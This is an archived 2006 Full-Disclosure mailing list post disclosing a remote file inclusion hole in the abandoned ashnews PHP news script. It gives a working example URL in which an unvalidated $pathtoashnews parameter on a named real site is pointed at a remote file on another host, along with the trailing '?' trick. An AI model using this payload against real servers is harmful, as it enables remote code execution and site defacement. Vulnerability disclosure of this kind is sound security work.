|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-disclosure] ashnews Cross-Site Scripting Vulnerability
From: DanB-FD (dan-fd
f-box.org)
Date: Tue Jan 31 2006 - 04:43:19 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi,
Dan B UK wrote:
> Due to the nature of the issue I am not disclosing the detail of it
> until the writer of the software has updated it; maybe you could have
> waited??
>
> A vulnerability that allows privileges of the apache user within the
> limitations of how much PHP has been locked down.
Since the author of the product has got back to me with the following I
think it is ok to disclose the issue now.
"That is a known error. Unfortunately I have completely abondoned
ashnews. In fact, I have been neglecting taking it down completely which
I am going to do right now. - Derek"
The issue is in the handling of the $pathtoashnews, it is not validated
before being used by the script. Allowing remote or local file inclusion.
eg:
http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc?
( The ? is required to make the remote server (f-box.org) ignore the
string that is appended to the variable $pathtoashnews )
( The website that is in the example above has already been defaced! )
Cheers,
DanB UK.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]